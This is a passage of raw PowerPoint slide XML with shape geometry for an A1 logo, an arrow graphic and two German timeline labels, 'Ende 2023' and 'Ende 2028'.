                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76134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feil: nach rechts 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B727CF43-D52C-4D7A-0195-0C56279C1838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="2960948"/>
            <a:ext cx="10770983" cy="936104"/>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AT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Textfeld 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56090C34-3CEF-CB22-753D-137419630749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-770853" y="3136611"/>
            <a:ext cx="2304257" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="de-AT" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ende 2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697EC29C-739D-91F0-9490-80A3EF453E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="10596715" y="3138831"/>
            <a:ext cx="2304258" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="de-AT" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ende 2028</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F96427-669C-6FE0-CB21-79D7C7705054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freihandform: Form 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF12725-E090-1AD9-8B59-BC418D60F8F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freihandform: Form 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1BC185-1B8E-F388-3C65-2026293BEE52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
